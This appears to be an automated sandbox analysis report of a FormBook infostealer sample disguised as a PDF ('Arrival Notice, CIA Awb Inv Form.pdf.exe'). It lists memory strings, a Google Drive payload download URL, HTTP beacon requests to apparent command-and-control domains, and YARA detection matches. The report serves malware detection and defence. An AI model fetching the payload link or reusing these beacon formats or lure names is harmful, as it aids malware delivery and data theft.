Source: explorer.exe, 00000007.00000000.22685687246.000000000516B000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22966433478.000000000516B000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22640100372.000000000516B000.00000004.00000001.sdmp String found in binary or memory: http://www.foreca.com
Source: explorer.exe, 00000007.00000000.22689085611.00000000094EB000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22969621202.00000000094EB000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22643182960.00000000094EB000.00000004.00000001.sdmp String found in binary or memory: https://aka.ms/odirm
Source: explorer.exe, 00000007.00000000.22689085611.00000000094EB000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22969621202.00000000094EB000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22643182960.00000000094EB000.00000004.00000001.sdmp String found in binary or memory: https://api.msn.com/
Source: explorer.exe, 00000007.00000000.22763778263.0000000010ADD000.00000004.00000001.sdmp String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=a
Source: explorer.exe, 00000007.00000000.22984664449.000000000D525000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22755147117.000000000D525000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22654970416.000000000D525000.00000004.00000001.sdmp String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: explorer.exe, 00000007.00000000.22750707443.000000000D05E000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22980392582.000000000D05E000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22651288186.000000000D05E000.00000004.00000001.sdmp String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?
Source: explorer.exe, 00000007.00000000.22685687246.000000000516B000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22966433478.000000000516B000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22640100372.000000000516B000.00000004.00000001.sdmp String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=5696A836803C42E0B53F7BB2770E5342&timeOut=10000&o
Source: explorer.exe, 00000007.00000000.22685687246.000000000516B000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22659836034.000000001067D000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22966433478.000000000516B000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22707875865.000000001067D000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22760864296.000000001067D000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22640100372.000000000516B000.00000004.00000001.sdmp String found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
Source: explorer.exe, 00000007.00000000.22738052664.0000000009340000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22641184172.0000000009340000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22967614281.0000000009340000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22686996294.0000000009340000.00000004.00000001.sdmp String found in binary or memory: https://arc.msn.com
Source: explorer.exe, 00000007.00000000.22685687246.000000000516B000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22966433478.000000000516B000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22640100372.000000000516B000.00000004.00000001.sdmp String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/svg/72/MostlySunnyDay.svg
Source: explorer.exe, 00000007.00000000.22689085611.00000000094EB000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22969621202.00000000094EB000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22643182960.00000000094EB000.00000004.00000001.sdmp String found in binary or memory: https://contentstorage.osi.office.net/dynamiccanvas/licensingui/index.html?mode=NewDeviceActivation
Source: explorer.exe, 00000007.00000000.22689085611.00000000094EB000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22969621202.00000000094EB000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22643182960.00000000094EB000.00000004.00000001.sdmp String found in binary or memory: https://contentstorage.osi.office.net/dynamiccanvas/licensingui/index.html?mode=NewDeviceActivationi
Source: Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000003.22619512198.000000000091D000.00000004.00000001.sdmp String found in binary or memory: https://csp.withgoogle.com/csp/drive-explorer/
Source: Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000003.22619512198.000000000091D000.00000004.00000001.sdmp String found in binary or memory: https://csp.withgoogle.com/csp/report-to/gse_l9ocaq
Source: NETSTAT.EXE, 00000008.00000002.26929044585.00000000034CF000.00000004.00020000.sdmp, NETSTAT.EXE, 00000008.00000002.26923234058.0000000002962000.00000004.00000020.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe String found in binary or memory: https://d.symcb.com/cps0%
Source: NETSTAT.EXE, 00000008.00000002.26929044585.00000000034CF000.00000004.00020000.sdmp, NETSTAT.EXE, 00000008.00000002.26923234058.0000000002962000.00000004.00000020.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe String found in binary or memory: https://d.symcb.com/rpa0
Source: NETSTAT.EXE, 00000008.00000002.26929044585.00000000034CF000.00000004.00020000.sdmp, NETSTAT.EXE, 00000008.00000002.26923234058.0000000002962000.00000004.00000020.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe String found in binary or memory: https://d.symcb.com/rpa0.
Source: Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000003.22625529754.0000000000908000.00000004.00000001.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000003.22625903435.0000000000918000.00000004.00000001.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22817443530.0000000000918000.00000004.00000001.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000003.22623529226.000000000091C000.00000004.00000001.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22817351739.0000000000907000.00000004.00000001.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000003.22624760736.0000000000918000.00000004.00000001.sdmp String found in binary or memory: https://doc-14-5s-docs.googleusercontent.com/
Source: Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22816989245.00000000008D8000.00000004.00000020.sdmp String found in binary or memory: https://doc-14-5s-docs.googleusercontent.com/%%doc-14-5s-docs.googleusercontent.com
Source: Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22817351739.0000000000907000.00000004.00000001.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000003.22624760736.0000000000918000.00000004.00000001.sdmp String found in binary or memory: https://doc-14-5s-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/nqfdtgt6
Source: Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000003.22625903435.0000000000918000.00000004.00000001.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22817443530.0000000000918000.00000004.00000001.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000003.22623529226.000000000091C000.00000004.00000001.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000003.22624760736.0000000000918000.00000004.00000001.sdmp String found in binary or memory: https://doc-14-5s-docs.googleusercontent.com/tography
Source: Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22816876287.00000000008C2000.00000004.00000020.sdmp String found in binary or memory: https://drive.google.com/
Source: Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22818584241.00000000023F0000.00000004.00000001.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22817051370.00000000008E0000.00000004.00000020.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22816876287.00000000008C2000.00000004.00000020.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=16igyruBeyi1SLH2lfqbjS2ggty9bFGFC
Source: Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22816876287.00000000008C2000.00000004.00000020.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=16igyruBeyi1SLH2lfqbjS2ggty9bFGFCB
Source: Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22816876287.00000000008C2000.00000004.00000020.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=16igyruBeyi1SLH2lfqbjS2ggty9bFGFCh&
Source: explorer.exe, 00000007.00000000.22704620930.000000000D6D5000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22986677846.000000000D6D5000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22656652438.000000000D6D5000.00000004.00000001.sdmp String found in binary or memory: https://excel.office.com
Source: explorer.exe, 00000007.00000000.22763778263.0000000010ADD000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22709261731.00000000109B4000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22661302850.00000000109B4000.00000004.00000001.sdmp String found in binary or memory: https://ims-na1.adobelogin.com/ims/authorize/v1?locale=en_us&client_id=AdobeReader9&redirect_uri=htt
Source: explorer.exe, 00000007.00000000.22659836034.000000001067D000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22707875865.000000001067D000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22760864296.000000001067D000.00000004.00000001.sdmp String found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/hrd?lcid=1033&syslcid=2057&uilcid=1033&app=0&ver=16&build=1
Source: explorer.exe, 00000007.00000000.22704620930.000000000D6D5000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22986677846.000000000D6D5000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22656652438.000000000D6D5000.00000004.00000001.sdmp String found in binary or memory: https://outlook.com
Source: explorer.exe, 00000007.00000000.22984417636.000000000D4F4000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22754900142.000000000D4F4000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22654737060.000000000D4F4000.00000004.00000001.sdmp String found in binary or memory: https://powerpoint.office.come
Source: NETSTAT.EXE, 00000008.00000002.26929375069.00000000039BF000.00000004.00020000.sdmp String found in binary or memory: https://sedo.com/search/details/?partnerid=324561&language=e&domain=izivente.com&origin=sales_lander
Source: explorer.exe, 00000007.00000000.22685687246.000000000516B000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22966433478.000000000516B000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22640100372.000000000516B000.00000004.00000001.sdmp String found in binary or memory: https://windows.msn.com:443/shell
Source: explorer.exe, 00000007.00000000.22704620930.000000000D6D5000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22986677846.000000000D6D5000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22656652438.000000000D6D5000.00000004.00000001.sdmp String found in binary or memory: https://word.office.com
Source: explorer.exe, 00000007.00000000.22984664449.000000000D525000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22755147117.000000000D525000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22654970416.000000000D525000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22727056323.0000000000B94000.00000004.00000020.sdmp, explorer.exe, 00000007.00000000.22956960258.0000000000B94000.00000004.00000020.sdmp, explorer.exe, 00000007.00000000.22632233648.0000000000B94000.00000004.00000020.sdmp String found in binary or memory: https://www.digicert.com/CPS0
Source: explorer.exe, 00000007.00000000.22984664449.000000000D525000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22755147117.000000000D525000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22654970416.000000000D525000.00000004.00000001.sdmp String found in binary or memory: https://www.msn.com/?ocid=iehp
Source: explorer.exe, 00000007.00000000.22984664449.000000000D525000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22755147117.000000000D525000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22654970416.000000000D525000.00000004.00000001.sdmp String found in binary or memory: https://www.msn.com/?ocid=iehpA
Source: explorer.exe, 00000007.00000000.22984664449.000000000D525000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22755147117.000000000D525000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22654970416.000000000D525000.00000004.00000001.sdmp String found in binary or memory: https://www.msn.com/de-ch/?ocid=iehp
Source: explorer.exe, 00000007.00000000.22685687246.000000000516B000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22966433478.000000000516B000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22640100372.000000000516B000.00000004.00000001.sdmp String found in binary or memory: https://www.msn.com/en-us/news/crime/charges-man-snapped-killed-4-then-left-bodies-in-field/ar-AAOGa
Source: explorer.exe, 00000007.00000000.22685687246.000000000516B000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22966433478.000000000516B000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22640100372.000000000516B000.00000004.00000001.sdmp String found in binary or memory: https://www.msn.com/en-us/news/technology/facebook-oversight-board-reviewing-xcheck-system-for-vips/
Source: explorer.exe, 00000007.00000000.22685687246.000000000516B000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22966433478.000000000516B000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22640100372.000000000516B000.00000004.00000001.sdmp String found in binary or memory: https://www.msn.com/en-us/news/us/texas-gov-abbott-sends-miles-of-cars-along-border-to-deter-migrant
Source: explorer.exe, 00000007.00000000.22685687246.000000000516B000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22966433478.000000000516B000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22640100372.000000000516B000.00000004.00000001.sdmp String found in binary or memory: https://www.msn.com/en-us/tv/celebrity/tarek-el-moussa-tests-positive-for-covid-19-shuts-down-filmin
Source: explorer.exe, 00000007.00000000.22685687246.000000000516B000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22966433478.000000000516B000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22640100372.000000000516B000.00000004.00000001.sdmp String found in binary or memory: https://www.msn.com:443/en-us/feed
Source: unknown DNS traffic detected: queries for: drive.google.com
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=16igyruBeyi1SLH2lfqbjS2ggty9bFGFC HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/nqfdtgt678la5ha3g2tbhed40e9h4e57/1637762850000/13904828925096904893/*/16igyruBeyi1SLH2lfqbjS2ggty9bFGFC?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-14-5s-docs.googleusercontent.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /s3f1/?0v=PTZX9bbDrHz+cSGvcymGk0mts24461Z1qQ1nyKxozOrcJ62jRcnhMEjPJVIjYEdLVzgY&kTGXE2=5jpDxBr8jNJ0VnGP HTTP/1.1Host: www.izivente.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /s3f1/?0v=djAV39Fd+2tTaJZ0vMg9wx3f2dAzn5uoNnRL0R1SzoIuCwqtHRucI/njP/LN+anlykG6&kTGXE2=5jpDxBr8jNJ0VnGP HTTP/1.1Host: www.musee-radix-hairsalon.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /s3f1/?0v=sqInqd/J1oF05xIRIYy6fIocxGbhQvf/UJ8WsTvvwcutrQRehAYuBiNZHMXnLC/ELIDP&kTGXE2=5jpDxBr8jNJ0VnGP HTTP/1.1Host: www.teslafreesuperchargermiles.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /s3f1/?0v=SHCw80AJpwYBr9Gcy19d9t3wNH3OULHDJ3WoL9xOYwR6hbrNjBBxIJP5Ay3SVk+aC6rM&kTGXE2=5jpDxBr8jNJ0VnGP HTTP/1.1Host: www.mvsteals.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /s3f1/?0v=mH/60k+8QaINko6jE2QpZl5PE74OV+HVH/ClSiWHQSmVZS7BQfRqR+Cg+8qmWPEHLuT3&kTGXE2=5jpDxBr8jNJ0VnGP HTTP/1.1Host: www.thaicharuen.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /s3f1/?0v=UFnETU8dieTu408infxPFcIZ9A51JABruIfjxtzTo70f1rUHWxHKXlzNhsAQN9Kxpi4c&kTGXE2=5jpDxBr8jNJ0VnGP HTTP/1.1Host: www.morningstarapparel.spaceConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /s3f1/?0v=09o28MjQy1cZQ5Pjj+CLcbQvMAiWJGV2Uxg7+ScaYTXEQUafs3S8SGgaduHkLU6DHZH5&kTGXE2=5jpDxBr8jNJ0VnGP HTTP/1.1Host: www.soarlikeaneagle.siteConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /s3f1/?0v=mbzqDKJ3zGVZXRXzBR45Cgdnnesr2+nRJSwniRIMGUaPxNPQA+ji5LfWApDcm/CqO18J&kTGXE2=5jpDxBr8jNJ0VnGP HTTP/1.1Host: www.evaccines.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /s3f1/?0v=NBR0aPdzKjxBJ/qIBF///end99Hz3MSBKbZXqSBgBb5XrtkET9he0lXIERUBepCdWUFS&kTGXE2=5jpDxBr8jNJ0VnGP HTTP/1.1Host: www.celsb.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /s3f1/?0v=d8/OqiJyMkDaGTNTMgoxgiTtJv1BTsaVDDjuqFtpNub02Pcaaru29SvOabQgh8wWKZWy&hXeT=Wxlp HTTP/1.1Host: www.4mtechmachines.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /s3f1/?0v=F/pbsBegFO7o3fLKo/FzEC9ZwTRXzaIgUSgpsvNThmOurZQxU5rRi5MGW6g3EwPdsbP6&hXeT=Wxlp HTTP/1.1Host: www.hara.cloudConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: unknown HTTPS traffic detected: 142.250.185.110:443 -> 192.168.11.20:49805 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.186.97:443 -> 192.168.11.20:49806 version: TLS 1.2

E-Banking Fraud:

barindex
Yara detected FormBook
Source: Yara match File source: 00000007.00000000.22694456011.000000000A598000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.22826427639.000000001E760000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.26922800429.0000000002800000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.26924489179.0000000002D00000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.26924755438.0000000002D30000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000000.22745903057.000000000A598000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.22815363833.00000000000A0000.00000040.00020000.sdmp, type: MEMORY

System Summary:

barindex
Malicious sample detected (through community Yara rule)
Source: 00000007.00000000.22694456011.000000000A598000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000000.22694456011.000000000A598000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.26929044585.00000000034CF000.00000004.00020000.sdmp, type: MEMORY Matched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
Source: 00000008.00000002.26923234058.0000000002962000.00000004.00000020.sdmp, type: MEMORY Matched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
Source: 00000006.00000002.22826427639.000000001E760000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.22826427639.000000001E760000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.26922800429.0000000002800000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.26922800429.0000000002800000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.26924489179.0000000002D00000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.26924489179.0000000002D00000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.26924755438.0000000002D30000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.26924755438.0000000002D30000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000000.22745903057.000000000A598000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000000.22745903057.000000000A598000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.22815363833.00000000000A0000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.22815363833.00000000000A0000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Initial sample is a PE file and has a suspicious name
Source: initial sample Static PE information: Filename: Arrival Notice, CIA Awb Inv Form.pdf.exe
Source: initial sample Static PE information: Filename: Arrival Notice, CIA Awb Inv Form.pdf.exe
Executable has a suspicious name (potential lure to open the executable)
Source: Arrival Notice, CIA Awb Inv Form.pdf.exe Static file information: Suspicious name
Uses 32bit PE files
Source: Arrival Notice, CIA Awb Inv Form.pdf.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Yara signature match
Source: 00000007.00000000.22694456011.000000000A598000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000000.22694456011.000000000A598000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.26929044585.00000000034CF000.00000004.00020000.sdmp, type: MEMORY Matched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000008.00000002.26923234058.0000000002962000.00000004.00000020.sdmp, type: MEMORY Matched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000006.00000002.22826427639.000000001E760000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.22826427639.000000001E760000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.26922800429.0000000002800000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.26922800429.0000000002800000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.26924489179.0000000002D00000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.26924489179.0000000002D00000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.26924755438.0000000002D30000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.26924755438.0000000002D30000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000000.22745903057.000000000A598000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000000.22745903057.000000000A598000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.22815363833.00000000000A0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.22815363833.00000000000A0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Detected potential crypto function
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 1_2_0040430D 1_2_0040430D
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 1_2_02B6CC3A 1_2_02B6CC3A
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 1_2_02B6CF85 1_2_02B6CF85
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 1_2_02B72FF6 1_2_02B72FF6
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 1_2_02B6C7E5 1_2_02B6C7E5
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 1_2_02B70C8F 1_2_02B70C8F
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 1_2_02B718FC 1_2_02B718FC
